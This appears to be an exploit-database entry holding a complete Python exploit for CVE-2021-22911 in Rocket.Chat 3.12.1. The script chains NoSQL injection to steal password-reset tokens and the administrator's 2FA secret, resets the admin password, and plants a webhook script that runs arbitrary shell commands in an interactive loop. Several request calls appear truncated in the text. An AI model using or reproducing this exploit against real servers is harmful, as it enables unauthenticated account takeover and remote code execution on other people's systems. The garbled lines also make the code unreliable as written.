3.12.1 nosql injection to rce (unauthenticated) (2)

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# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: # Vulnerable Version(s): Rocket.Chat 3.12.1 (2) # CVE: CVE-2021-22911 # Credits: # Info : This is a faster exploit that utilizes the authenticated nosql injection to retrieve the reset token for administrator instead of performing blind nosql injection. #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r ="/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r =, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r ="/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def admin_token(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting reset token for admin cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:89] print(f"Got the reset token: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r ="/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r ='/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token through blind nosql injection token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting admin reset token through nosql injection authenticated token = admin_token(target,lowprivmail) ## Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticating and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd) 3.12.1 nosql injection to rce (unauthenticated) (2) Vulnerability / Exploit Source : 3.12.1 nosql injection to rce (unauthenticated) (2)

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